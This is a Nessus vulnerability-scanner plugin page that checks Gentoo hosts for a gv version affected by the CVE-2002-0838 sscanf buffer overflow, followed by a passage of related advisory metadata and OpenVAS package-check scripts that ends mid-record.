ID GENTOO_GLSA-200408-10.NASL Type nessus Reporter This script is Copyright (C) 2004-2021 Tenable Network Security, Inc. Modified 2004-08-30T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-200408-10
(gv: Exploitable Buffer Overflow)
gv contains a buffer overflow vulnerability where an unsafe sscanf() call
is used to interpret PDF and PostScript files.
Impact :
By enticing a user to view a malformed PDF or PostScript file, an attacker
could execute arbitrary code with the permissions of the user running gv.
Workaround :
There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of gv.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200408-10.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration pass: when the scanner loads the plugin with `description` set,
# only the metadata below is recorded and the block ends with exit(0), so none
# of the package checks further down run in this pass.
if (description)
{
script_id(14566);
script_version("1.16");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
# Cross-references: the CVE and the Gentoo advisory (GLSA) this check is derived from.
script_cve_id("CVE-2002-0838");
script_xref(name:"GLSA", value:"200408-10");
script_name(english:"GLSA-200408-10 : gv: Exploitable Buffer Overflow");
# Per the summary this is a package-version check against the installed package
# database; it does not exercise the sscanf() overflow itself.
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
# Advisory text shown in the scan report (extracted from the GLSA, see file header).
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-200408-10
(gv: Exploitable Buffer Overflow)
gv contains a buffer overflow vulnerability where an unsafe sscanf() call
is used to interpret PDF and PostScript files.
Impact :
By enticing a user to view a malformed PDF or PostScript file an attacker
could execute arbitrary code with the permissions of the user running gv.
Workaround :
There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of gv."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/200408-10"
);
# Remediation: the first fixed ebuild revision named here (3.5.8-r4) is the same
# boundary the qpkg_check() call in the check phase uses.
script_set_attribute(
attribute:"solution",
value:
"All gv users should upgrade to the latest version:
# emerge sync
# emerge -pv '>=app-text/gv-3.5.8-r4'
# emerge '>=app-text/gv-3.5.8-r4'"
);
# CVSS v2 base vector: local access vector, low complexity, no authentication,
# partial C/I/A. The description above gives the trigger as a user viewing a
# malformed PDF/PostScript file, so hosts where gv opens documents from
# untrusted sources are the ones to prioritise when triaging this finding.
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P");
# "local" plugin type: the result comes from host data already collected in the
# knowledge base (see script_require_keys below), not from probing a service.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:gv");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
# Dates as recorded by the plugin: vulnerability public in 2002, Gentoo patch and
# plugin both published in August 2004.
script_set_attribute(attribute:"patch_publication_date", value:"2004/08/12");
script_set_attribute(attribute:"plugin_publication_date", value:"2004/08/30");
script_set_attribute(attribute:"vuln_publication_date", value:"2002/12/04");
script_end_attributes();
# Information-gathering category: the plugin only reads collected data.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
# Depends on ssh_get_info.nasl and on the three KB keys below; the same keys are
# re-checked at the start of the check phase.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
# End of the registration pass.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
# Check phase.
#
# Preconditions: each audit() call below reports why the plugin cannot give a
# verdict (local checks disabled, host not Gentoo, no package list collected).
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release"))
  audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Compare the installed app-text/gv version with the advisory's ranges:
# 3.5.8-r3 and older are vulnerable, 3.5.8-r4 and newer are fixed.
# NOTE(review): only the app-text/gv package is evaluated. The CVE entry quoted
# on this page also names ggv, gnome-gv and kghostview as sharing the flaw, and
# a gv binary installed outside the package manager would presumably not be
# seen by a package-list check -- confirm coverage with the sibling plugins.
flag = 0;
if (qpkg_check(
      package: "app-text/gv",
      unaffected: make_list("ge 3.5.8-r4"),
      vulnerable: make_list("le 3.5.8-r3")
    ))
{
  flag++;
}

if (!flag)
{
  # No vulnerable version matched: distinguish "installed but not affected"
  # from "gv is not installed at all" for the audit trail.
  tested = qpkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gv");
}
else
{
  # Vulnerable version present: report on port 0, attaching the package
  # comparison details only when report verbosity is above zero.
  if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());
  else security_warning(0);
  exit(0);
}
{"id": "GENTOO_GLSA-200408-10.NASL", "bulletinFamily": "scanner", "title": "GLSA-200408-10 : gv: Exploitable Buffer Overflow", "description": "The remote host is affected by the vulnerability described in GLSA-200408-10\n(gv: Exploitable Buffer Overflow)\n\n gv contains a buffer overflow vulnerability where an unsafe sscanf() call\n is used to interpret PDF and PostScript files.\n \nImpact :\n\n By enticing a user to view a malformed PDF or PostScript file an attacker\n could execute arbitrary code with the permissions of the user running gv.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version of gv.", "published": "2004-08-30T00:00:00", "modified": "2004-08-30T00:00:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/14566", "reporter": "This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/200408-10"], "cvelist": ["CVE-2002-0838"], "type": "nessus", "lastseen": "2021-01-07T10:51:50", "edition": 24, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0838"]}, {"type": "redhat", "idList": ["RHSA-2002:211"]}, {"type": "osvdb", "idList": ["OSVDB:8650", "OSVDB:8651", "OSVDB:8649"]}, {"type": "openvas", "idList": ["OPENVAS:53734", "OPENVAS:53733", "OPENVAS:54640", "OPENVAS:53756"]}, {"type": "cert", "idList": ["VU:600777"]}, {"type": "exploitdb", "idList": ["EDB-ID:21871", "EDB-ID:21872"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:3627"]}, {"type": "debian", "idList": ["DEBIAN:DSA-182-1:BF38F", "DEBIAN:DSA-176-1:0B654", "DEBIAN:DSA-179-1:3F636"]}, {"type": "gentoo", "idList": ["GLSA-200408-10"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-179.NASL", "MANDRAKE_MDKSA-2002-069.NASL", "REDHAT-RHSA-2002-211.NASL", "DEBIAN_DSA-176.NASL", "DEBIAN_DSA-182.NASL", "MANDRAKE_MDKSA-2002-071.NASL"]}], 
"modified": "2021-01-07T10:51:50", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-01-07T10:51:50", "rev": 2}, "vulnersScore": 7.4}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200408-10.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14566);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_xref(name:\"GLSA\", value:\"200408-10\");\n\n script_name(english:\"GLSA-200408-10 : gv: Exploitable Buffer Overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200408-10\n(gv: Exploitable Buffer Overflow)\n\n gv contains a buffer overflow vulnerability where an unsafe sscanf() call\n is used to interpret PDF and PostScript files.\n \nImpact :\n\n By enticing a user to view a malformed PDF or PostScript file an attacker\n could execute arbitrary code with the permissions of the user running gv.\n \nWorkaround :\n\n There is no known workaround at this time. 
All users are encouraged to\n upgrade to the latest available version of gv.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200408-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All gv users should upgrade to the latest version:\n # emerge sync\n # emerge -pv '>=app-text/gv-3.5.8-r4'\n # emerge '>=app-text/gv-3.5.8-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/gv\", unaffected:make_list(\"ge 3.5.8-r4\"), vulnerable:make_list(\"le 3.5.8-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = 
qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gv\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "14566", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:gv"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:36:59", "description": "Buffer overflow in (1) gv 3.5.8 and earlier, (2) gvv 1.0.2 and earlier, (3) ggv 1.99.90 and earlier, (4) gnome-gv, and (5) kghostview in kdegraphics 2.2.2 and earlier, allows attackers to execute arbitrary code via a malformed (a) PDF or (b) PostScript file, which is processed by an unsafe call to sscanf.", "edition": 3, "cvss3": {}, "published": "2002-10-10T04:00:00", "title": "CVE-2002-0838", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2002-0838"], "modified": "2016-10-18T02:22:00", "cpe": ["cpe:/a:ghostview:ghostview:1.4.1", "cpe:/a:gv:gv:3.5.2", "cpe:/a:gv:gv:2.9.4", "cpe:/a:ghostview:ghostview:1.3", "cpe:/a:gv:gv:3.5.3", "cpe:/a:gv:gv:3.2.4", "cpe:/a:ggv:ggv:1.0.2", "cpe:/a:gv:gv:2.7b2", "cpe:/a:ghostview:ghostview:1.4", "cpe:/a:gv:gv:3.1.4", "cpe:/a:gv:gv:2.7b3", "cpe:/a:gv:gv:3.4.12", "cpe:/a:gv:gv:3.4.3", "cpe:/a:gv:gv:2.7b4", "cpe:/a:gv:gv:3.0.0", "cpe:/a:gv:gv:2.7b1", "cpe:/a:gv:gv:3.5.8", "cpe:/a:gv:gv:2.7b5", "cpe:/a:gv:gv:3.0.4", "cpe:/a:gv:gv:3.1.6", "cpe:/a:gv:gv:2.7.6", "cpe:/a:ghostview:ghostview:1.5", "cpe:/a:gv:gv:3.4.2"], "id": "CVE-2002-0838", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0838", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ghostview:ghostview:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ghostview:ghostview:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.4.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:gv:gv:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b5:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b2:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b3:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ghostview:ghostview:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b1:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:ghostview:ghostview:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ggv:ggv:1.0.2:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2019-08-13T18:45:10", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "Gv and ggv are user interfaces for the Ghostscript PostScript(R)\ninterpreter used to display PostScript and PDF documents on an X Window\nSystem. KGhostview is the PostScript viewer for the K Desktop Environment.\n\nZen Parse found a local buffer overflow in gv version 3.5.8 and earlier. 
\nAn attacker can create a carefully crafted malformed PDF or PostScript file\nin such a way that when that file is viewed arbitrary commands can be executed.\n\nggv and kghostview contain code derived from gv and therefore have the same\nvulnerability.\n\nAll users of gv, ggv, and kghostview are advised to upgrade to the errata\npackages which contain patches to correct the vulnerability.", "modified": "2018-03-14T19:26:26", "published": "2003-02-06T05:00:00", "id": "RHSA-2002:211", "href": "https://access.redhat.com/errata/RHSA-2002:211", "type": "redhat", "title": "(RHSA-2002:211) ggv security update", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2002-0838"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:12281](https://secuniaresearch.flexerasoftware.com/advisories/12281/)\n[Secunia Advisory ID:7163](https://secuniaresearch.flexerasoftware.com/advisories/7163/)\n[Related OSVDB ID: 8650](https://vulners.com/osvdb/OSVDB:8650)\n[Related OSVDB ID: 8649](https://vulners.com/osvdb/OSVDB:8649)\nRedHat RHSA: RHSA-2002:220\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200408-10.xml\nISS X-Force ID: 10201\n[CVE-2002-0838](https://vulners.com/cve/CVE-2002-0838)\nBugtraq ID: 5808\n", "modified": "2002-12-04T00:00:00", "published": "2002-12-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8651", "id": "OSVDB:8651", "type": "osvdb", "title": "ggv sscanf Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2002-0838"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:12281](https://secuniaresearch.flexerasoftware.com/advisories/12281/)\n[Secunia Advisory 
ID:7163](https://secuniaresearch.flexerasoftware.com/advisories/7163/)\n[Related OSVDB ID: 8649](https://vulners.com/osvdb/OSVDB:8649)\n[Related OSVDB ID: 8651](https://vulners.com/osvdb/OSVDB:8651)\nRedHat RHSA: RHSA-2002:220\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200408-10.xml\nISS X-Force ID: 10201\n[CVE-2002-0838](https://vulners.com/cve/CVE-2002-0838)\nBugtraq ID: 5808\n", "modified": "2002-12-04T00:00:00", "published": "2002-12-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8650", "id": "OSVDB:8650", "type": "osvdb", "title": "gvv sscanf Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2002-0838"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:7163](https://secuniaresearch.flexerasoftware.com/advisories/7163/)\n[Secunia Advisory ID:12281](https://secuniaresearch.flexerasoftware.com/advisories/12281/)\n[Related OSVDB ID: 8650](https://vulners.com/osvdb/OSVDB:8650)\n[Related OSVDB ID: 8651](https://vulners.com/osvdb/OSVDB:8651)\nRedHat RHSA: RHSA-2002:220\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200408-10.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0180.html\nISS X-Force ID: 10201\n[CVE-2002-0838](https://vulners.com/cve/CVE-2002-0838)\nBugtraq ID: 5808\n", "modified": "2002-12-04T00:00:00", "published": "2002-12-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8649", "id": "OSVDB:8649", "type": "osvdb", "title": "gv sscanf Local Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "description": "The remote host is missing an update to gnome-gv\nannounced via advisory DSA 179-1.", "modified": 
"2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53734", "href": "http://plugins.openvas.org/nasl.php?oid=53734", "type": "openvas", "title": "Debian Security Advisory DSA 179-1 (gnome-gv)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_179_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 179-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in gnome-gv. This problem\nis triggered by scanning the PostScript file and can be exploited by\nan attacker sending a malformed PostScript or PDF file. 
The attacker\nis able to cause arbitrary code to be run with the privileges of the\nvictim.\n\nThis problem has been fixed in version 1.1.96-3.1 for the current\nstable distribution (woody), in version 0.82-2.1 for the old stable\ndistribution (potato) and version 1.99.7-9 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your gnome-gv package.\";\ntag_summary = \"The remote host is missing an update to gnome-gv\nannounced via advisory DSA 179-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20179-1\";\n\nif(description)\n{\n script_id(53734);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 179-1 (gnome-gv)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gnome-gv\", ver:\"0.82-2.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gnome-gv\", ver:\"1.1.96-3.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "description": "The remote host is missing an update to gv\nannounced via advisory DSA 176-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53733", "href": "http://plugins.openvas.org/nasl.php?oid=53733", "type": "openvas", "title": "Debian Security Advisory DSA 176-1 (gv)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_176_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 176-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. This problem is triggered by scanning the PostScript\nfile and can be exploited by an attacker sending a malformed\nPostScript or PDF file. 
The attacker is able to cause arbitrary code\nto be run with the privileges of the victim.\n\nThis problem has been fixed in version 3.5.8-26.1 for the current\nstable distribution (woody), in version 3.5.8-17.1 for the old stable\ndistribution (potato) and version 3.5.8-27 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your gv package.\";\ntag_summary = \"The remote host is missing an update to gv\nannounced via advisory DSA 176-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20176-1\";\n\nif(description)\n{\n script_id(53733);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 176-1 (gv)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gv\", ver:\"3.5.8-17.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gv\", ver:\"3.5.8-26.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200408-10.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54640", "href": "http://plugins.openvas.org/nasl.php?oid=54640", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200408-10 (gv)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"gv contains an exploitable buffer overflow that allows an attacker to\nexecute arbitrary code.\";\ntag_solution = \"All gv users should upgrade to the latest version:\n\n # emerge sync\n\n # emerge -pv '>=app-text/gv-3.5.8-r4'\n # emerge '>=app-text/gv-3.5.8-r4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200408-10\nhttp://bugs.gentoo.org/show_bug.cgi?id=59385\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200408-10.\";\n\n \n\nif(description)\n{\n script_id(54640);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(5808);\n script_cve_id(\"CVE-2002-0838\");\n script_tag(name:\"cvss_base\", 